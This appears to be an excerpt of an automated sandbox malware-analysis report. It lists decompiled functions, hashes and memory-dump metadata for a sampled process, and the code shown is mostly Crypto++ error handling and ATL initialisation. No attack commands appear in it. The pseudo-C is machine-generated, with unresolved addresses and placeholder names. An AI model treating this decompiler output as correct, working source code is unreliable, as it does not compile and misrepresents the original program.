Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: : missing required parameter '
API String ID: 1139647276-3853945970
Opcode ID: 20c82573768744fab51d4e49de57602ead92dc847fafc7794c9e164fa614a6e8
Instruction ID: f896d50462be4bdfb9d64b4ee51173b964379b06704a80690d8774d55a43506c
Opcode Fuzzy Hash: 20c82573768744fab51d4e49de57602ead92dc847fafc7794c9e164fa614a6e8
Instruction Fuzzy Hash: 31018475940318BBDF10EBA4DC46FCEBBBCAF26309F104085F905B3241CAB49A88D761

Uniqueness

Uniqueness Score: -1.00%

Function 00E4DC81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4DC8B

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00E4DD0C

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

: missing required parameter ', xrefs: 00E4DCB6

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: : missing required parameter '
API String ID: 1139647276-3853945970
Opcode ID: 681ae195718c69632e1bc511c6a6c1ab8cc476eafc7c8adcfaad27ee7ba53292
Instruction ID: 294d8051bc6c9a4f2a972b985666986f64ed1003252a7a5f006e99b5ecd0031b
Opcode Fuzzy Hash: 681ae195718c69632e1bc511c6a6c1ab8cc476eafc7c8adcfaad27ee7ba53292
Instruction Fuzzy Hash: 23018475D40319BADF10EBA4DC46FCEBBBCAF25309F104185F909B3242CA749B889761

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5B15 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00CA5B15(intOrPtr* __ecx) {
				void* _t19;
				intOrPtr _t20;
				intOrPtr* _t30;
				intOrPtr _t34;
				intOrPtr* _t35;
				void* _t36;

				0xe21503(0x44);
				_t35 = __ecx;
				_t34 =  *((intOrPtr*)(_t36 + 8));
				if( *((char*)(_t36 + 0xc)) != 0 &&  *((intOrPtr*)( *__ecx + 0xbc))() == 0) {
					E00CA1E2C(_t36 - 0x28, "Unflushable<T>: this object has buffered input that cannot be flushed");
					 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
					E00CA4197(_t36 - 0x50);
					 *((intOrPtr*)(_t36 - 0x50)) = 0xe92cc0;
					0xe2143b(_t36 - 0x50, 0xee8150, 2, _t36 - 0x28);
				}
				_t30 =  *((intOrPtr*)( *_t35 + 0xa4))();
				if(_t30 == 0) {
					L6:
					_t19 = 0;
				} else {
					_t20 =  *((intOrPtr*)(_t36 + 0x10));
					if(_t20 == 0) {
						goto L6;
					} else {
						_t19 =  *((intOrPtr*)( *_t30 + 0x90))(_t34,  *((intOrPtr*)(_t36 + 0xc)), _t20 - 1,  *((intOrPtr*)(_t36 + 0x14)));
					}
				}
				0xe214b2();
				return _t19;
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA5B1C

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA5B67

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

Unflushable<T>: this object has buffered input that cannot be flushed, xrefs: 00CA5B38

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: Unflushable<T>: this object has buffered input that cannot be flushed
API String ID: 1139647276-3781273281
Opcode ID: 2e1cc7b333a533a76278985f90dd3e0cb88e2aacca18f7a0779b3e4076e0b4e0
Instruction ID: 912816084cf7ccdc803cf9d1088e6dc0ea93239ddd6a5466b758e46d2ae3defd
Opcode Fuzzy Hash: 2e1cc7b333a533a76278985f90dd3e0cb88e2aacca18f7a0779b3e4076e0b4e0
Instruction Fuzzy Hash: 78018C74A00609EFDF00EFA0C805FED77B4AF55305F088468F816AB282CBB0DA058B60

Uniqueness

Uniqueness Score: -1.00%

Function 00E4BC7F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E4BC86

Part of subcall function 00E4BBDB: __EH_prolog3.LIBCMT ref: 00E4BBE2

Part of subcall function 00E4B7B5: __EH_prolog3.LIBCMT ref: 00E4B7BC

Part of subcall function 00CA2FD4: __EH_prolog3.LIBCMT ref: 00CA2FDB

Part of subcall function 00E4CB55: __EH_prolog3_GS.LIBCMT ref: 00E4CB5C

Strings

HashVerificationFilterFlags, xrefs: 00E4BCCC
TruncatedDigestSize, xrefs: 00E4BCE9

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3$H_prolog3_
String ID: HashVerificationFilterFlags$TruncatedDigestSize
API String ID: 4240126716-2207988728
Opcode ID: 1ee60265a7af7b24bf5dbb17a2f63451137e2c1426fa904f50a87e78bf4106ef
Instruction ID: 894315aa23840cf5d29470fb0e47668d52d89fc6212064b7bb1940bcbe1a9393
Opcode Fuzzy Hash: 1ee60265a7af7b24bf5dbb17a2f63451137e2c1426fa904f50a87e78bf4106ef
Instruction Fuzzy Hash: 531184B0904758AEC719EF58D842A9EBBF4EF14304F00449EF44AB7342D7B496419B65

Uniqueness

Uniqueness Score: -1.00%

Function 00CA436E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00CA436E(intOrPtr* __ecx, void* __eflags) {
				void* _t12;
				void* _t14;
				intOrPtr* _t29;
				void* _t31;

				0xe21503(0x4c);
				_t29 = __ecx;
				_t24 = _t31 - 0x58;
				_t12 = E00CA1E2C(_t31 - 0x58, "AlgorithmParametersBase: parameter \"");
				 *((intOrPtr*)(_t31 - 4)) = 0;
				_t14 = E00CA2ED4(0, _t31 - 0x58, _t31 - 0x28, _t12,  *((intOrPtr*)(_t31 + 8)));
				 *((char*)(_t31 - 4)) = 1;
				 *((char*)(_t31 - 4)) = 2;
				E00CA4197(_t29);
				E00CA23D6(_t31 - 0x40, 1, 0);
				E00CA23D6(_t31 - 0x28, 1, 0);
				E00CA23D6(_t31 - 0x58, 1, 0);
				 *_t29 = 0xe92e34;
				0xe214b2(6, E00CA2ED4(0, _t24, _t31 - 0x40, _t14, "\" not used"));
				return _t29;
			}

0x00ca4375
0x00ca437a
0x00ca437f
0x00ca4387
0x00ca4394
0x00ca4397
0x00ca43a5
0x00ca43b7
0x00ca43bb
0x00ca43c6
0x00ca43d1
0x00ca43dc
0x00ca43e1
0x00ca43e9
0x00ca43ee

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA4375

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

Part of subcall function 00CA23D6: _memmove.LIBCMT ref: 00CA23F6

Strings

" not used, xrefs: 00CA439C
AlgorithmParametersBase: parameter ", xrefs: 00CA4382

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3H_prolog3__memmove
String ID: " not used$AlgorithmParametersBase: parameter "
API String ID: 2549280591-612349224
Opcode ID: 8cf911cbe386764f952403edba86ad56b282bc375e7f9cc03ea0c71a72d62fb0
Instruction ID: 4b6cbe18cc44be5fa84bbf35bb24d279b59d0076bdf11f1fe3b9d786958e37b7
Opcode Fuzzy Hash: 8cf911cbe386764f952403edba86ad56b282bc375e7f9cc03ea0c71a72d62fb0
Instruction Fuzzy Hash: 02018F71900219AADF04EBA4CC82FEE7A6CAF65308F041058F605BB182DBF44E849761

Uniqueness

Uniqueness Score: -1.00%

Function 00CA44D9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00CA44D9(intOrPtr* __ecx, void* __eflags) {
				void* _t18;
				void* _t33;
				intOrPtr* _t36;
				void* _t37;

				0xe214d0(0x24);
				_t36 = __ecx;
				0xe49b4b(0);
				 *(__ecx + 0xc) =  *(__ecx + 0xc) | 0xffffffff;
				 *((char*)(__ecx + 0x10)) = 0;
				 *__ecx = 0xe9302c;
				 *((intOrPtr*)(__ecx + 4)) = 0xe930e4;
				_t18 = E00CA40CA(_t37 - 0x30);
				 *(_t37 - 4) = 0;
				 *(_t37 - 4) = 1;
				0xe4d8b2(E00CA315F(), _t37 - 0x18, "InputBuffer", _t18, 1,  *((intOrPtr*)(_t37 + 8)), 0);
				 *(_t37 - 4) = 0;
				E00CA4C1B(_t37 - 0x14);
				_t33 =  *(_t37 - 0x1c);
				 *(_t37 - 4) =  *(_t37 - 4) | 0xffffffff;
				memset(_t33, 0,  *(_t37 - 0x20) << 0);
				0xe4b574(_t33);
				0xe2149e();
				return _t36;
			}

APIs

__EH_prolog3.LIBCMT ref: 00CA44E0

Part of subcall function 00E49B4B: __EH_prolog3_GS.LIBCMT ref: 00E49B55
Part of subcall function 00E49B4B: __CxxThrowException@8.LIBCMT ref: 00E49BB4

Part of subcall function 00CA40CA: __EH_prolog3.LIBCMT ref: 00CA40D1

Part of subcall function 00CA315F: __EH_prolog3.LIBCMT ref: 00CA3166

Part of subcall function 00E4D8B2: __EH_prolog3_GS.LIBCMT ref: 00E4D8B9
Part of subcall function 00E4D8B2: __CxxThrowException@8.LIBCMT ref: 00E4D91A

Strings

0, xrefs: 00CA4503
InputBuffer, xrefs: 00CA4518

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3$Exception@8H_prolog3_Throw
String ID: InputBuffer$0
API String ID: 605474211-1687221730
Opcode ID: a5eaedab8f0551a300b8f05f1c2c83ea4bf9c9a15ce5cf1663a831e8b90affbb
Instruction ID: ad78e0ad9f57a932fd510ba5c81fc331c58c884321e5376a4a7cbce35580199a
Opcode Fuzzy Hash: a5eaedab8f0551a300b8f05f1c2c83ea4bf9c9a15ce5cf1663a831e8b90affbb
Instruction Fuzzy Hash: BF01B170900309EECB14EBB49842A9EBAA4AF64324F109649B165732C2CBB49B05DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6972 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00CA6972(intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, short _a8) {
				signed int _v0;
				intOrPtr _v8;
				short _t24;
				intOrPtr _t25;
				void* _t27;
				signed int _t34;
				intOrPtr* _t37;

				_t37 = __ecx;
				_t34 = _a4;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				if(_t34 != 0) {
					if(_t34 > 0x7fffffff) {
						0xe48b37("vector<T> too long");
						asm("int3");
						_t32 = __ecx;
						if(_v8 != 1) {
							if( *((intOrPtr*)(__ecx + 0x14)) >= 8) {
								_t32 =  *__ecx;
							}
							return E00CAB5A8(_t32 + _v0 * 2, _a8, _a4);
						} else {
							if( *((intOrPtr*)(__ecx + 0x14)) >= 8) {
								_t32 =  *__ecx;
							}
							_t24 = _a8;
							 *((short*)(_t32 + _v0 * 2)) = _t24;
							return _t24;
						}
					}
					_push(0);
					_t25 = E00CA3233(_t34);
					 *_t37 = _t25;
					 *((intOrPtr*)(_t37 + 4)) = _t25;
					 *((intOrPtr*)(_t37 + 8)) = _t25 + _t34 * 2;
					_t27 = 1;
				} else {
					_t27 = 0;
				}
				return _t27;
			}

APIs

_Allocate.LIBCPMT ref: 00CA6998
std::_Xinvalid_argument.LIBCPMT ref: 00CA69B7

Part of subcall function 00E48B37: std::exception::exception.LIBCMT ref: 00E48B4A
Part of subcall function 00E48B37: __CxxThrowException@8.LIBCMT ref: 00E48B5F

Strings

vector<T> too long, xrefs: 00CA69B2

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: AllocateException@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: vector<T> too long
API String ID: 2227214630-3788999226
Opcode ID: 5a4603d178e44a35e4bd09fcbe3f83af0888b9251c69014a408794f542c0ba1c
Instruction ID: 750adda0f69a17c22ee6ac16cbcc029fa7505ef631f615b16fe02cc297789121
Opcode Fuzzy Hash: 5a4603d178e44a35e4bd09fcbe3f83af0888b9251c69014a408794f542c0ba1c
Instruction Fuzzy Hash: A6F0A072404306AF8720DF39D40156BB7E8DEA6770320843FE9A9C7740EA31A94147A4

Uniqueness

Uniqueness Score: -1.00%

Function 00CA60D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00CA60D0() {
				void* _t18;
				void* _t22;

				0xe21503(0x44);
				E00CA1E2C(_t22 - 0x28, "RandomNumberGenerator: IncorporateEntropy not implemented");
				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
				_t18 = _t22 - 0x50;
				E00CA4197(_t18);
				 *((intOrPtr*)(_t22 - 0x50)) = 0xe92cb4;
				0xe2143b(_t22 - 0x50, 0xee8098, 0, _t22 - 0x28);
				asm("int3");
				goto ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t18 + 0xfffffffc)) + 0x48))())) + 0x28)));
			}

0x00ca60d7
0x00ca60e4
0x00ca60e9
0x00ca60f3
0x00ca60f6
0x00ca6103
0x00ca610b
0x00ca6110
0x00ca611d

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA60D7

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA610B

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 00CA60DC

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: RandomNumberGenerator: IncorporateEntropy not implemented
API String ID: 1139647276-49352013
Opcode ID: 85e8114903292c56232e2cb9fa2f8a2e9613649d5ff90edc55647e6246cf82a0
Instruction ID: 2441470c83c365441358be75fc6cf32700013ddca7cf2a14e871e1a501782a4f
Opcode Fuzzy Hash: 85e8114903292c56232e2cb9fa2f8a2e9613649d5ff90edc55647e6246cf82a0
Instruction Fuzzy Hash: 68F03974A40218EFDF04EBE4C856BDD73B4AF59314F2021A8F615BB2A1DBB09A49CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00CA664A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00CA664A(void* __ecx) {
				intOrPtr _t11;
				void* _t18;

				0xe21503(0x44);
				_t11 =  *((intOrPtr*)(_t18 + 8));
				if(_t11 != 0 && _t11 !=  *((intOrPtr*)(__ecx + 0x10))) {
					E00CA1E2C(_t18 - 0x28, "CipherModeBase: feedback size cannot be specified for this cipher mode");
					 *(_t18 - 4) =  *(_t18 - 4) & 0x00000000;
					E00CA4197(_t18 - 0x50);
					_t11 = _t18 - 0x50;
					 *((intOrPtr*)(_t18 - 0x50)) = 0xe92ca8;
					0xe2143b(_t11, 0xee8078, 1, _t18 - 0x28);
				}
				0xe214b2();
				return _t11;
			}

0x00ca6651
0x00ca6656
0x00ca665b
0x00ca666a
0x00ca666f
0x00ca667c
0x00ca6686
0x00ca6689
0x00ca6691
0x00ca6691
0x00ca6696
0x00ca669b

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA6651

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA6691

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

CipherModeBase: feedback size cannot be specified for this cipher mode, xrefs: 00CA6662

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: CipherModeBase: feedback size cannot be specified for this cipher mode
API String ID: 1139647276-2561568580
Opcode ID: 53767683ac165da746ca80823484383bae2f436127b866cdc6c7e8f7b78c5b12
Instruction ID: ff433aed89dc835f5c42f32d48600848a6459ae7be463aefeec5c820f824a289
Opcode Fuzzy Hash: 53767683ac165da746ca80823484383bae2f436127b866cdc6c7e8f7b78c5b12
Instruction Fuzzy Hash: 3BF03971A40318AADF10FAE0C842FDC73B4AF24705F542454F929FA081DBB0EA49CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00E485AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00E485FE: _memset.LIBCMT ref: 00E4860B

Part of subcall function 00CA213B: InitializeCriticalSectionAndSpinCount.KERNEL32(00F11814,00000000,00F11800,00E485DA,?,?,?,00CA1C23), ref: 00CA2140
Part of subcall function 00CA213B: GetLastError.KERNEL32(?,?,?,00CA1C23), ref: 00CA214A

IsDebuggerPresent.KERNEL32(?,?,?,00CA1C23), ref: 00E485DE
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00CA1C23), ref: 00E485ED

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E485E8

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 436010757-631824599
Opcode ID: 80b58cf8195329a42e14b12cbfb6e4825ce31475b09c37b0a020c24be444429c
Instruction ID: 0293a85c8bbf943b66afc13c76097bc6d92a3a0af7583d1d1bfd8f0ca69ae85d
Opcode Fuzzy Hash: 80b58cf8195329a42e14b12cbfb6e4825ce31475b09c37b0a020c24be444429c
Instruction Fuzzy Hash: C0E09270200711CFE7609F69EA047467BE0BF05748F04492DE586E3750DBB9E948CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E512AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E512B5

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00E512F2

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

AllocatorBase: requested size would cause integer overflow, xrefs: 00E512C3

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: AllocatorBase: requested size would cause integer overflow
API String ID: 1139647276-10355266
Opcode ID: 850f48b8441d1e722e76abd6564e6faa4749cc0a792e10005a0de49adfdeac3b
Instruction ID: 01728469658f788ecd88290bbee029d6dd7da2c67c9ab4eaa1255280d198a891
Opcode Fuzzy Hash: 850f48b8441d1e722e76abd6564e6faa4749cc0a792e10005a0de49adfdeac3b
Instruction Fuzzy Hash: 50E09A74C40318EACF00FBE0C802BEC77B4AF65316F802555F919BA0C1DBF08648C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5C9D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E00CA5C9D() {
				void* _t9;
				void* _t15;

				_t9 = 0xe8c02a;
				0xe21503(0x44);
				if( *((intOrPtr*)(_t15 + 8)) > 0xffffffff) {
					E00CA1E2C(_t15 - 0x28, "AllocatorBase: requested size would cause integer overflow");
					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
					E00CA4197(_t15 - 0x50);
					_t9 = _t15 - 0x50;
					 *((intOrPtr*)(_t15 - 0x50)) = 0xe92ca8;
					0xe2143b(_t9, 0xee8078, 1, _t15 - 0x28);
				}
				0xe214b2();
				return _t9;
			}

0x00ca5c9f
0x00ca5ca4
0x00ca5cad
0x00ca5cb7
0x00ca5cbc
0x00ca5cc9
0x00ca5cd3
0x00ca5cd6
0x00ca5cde
0x00ca5cde
0x00ca5ce3
0x00ca5ce8

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA5CA4

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

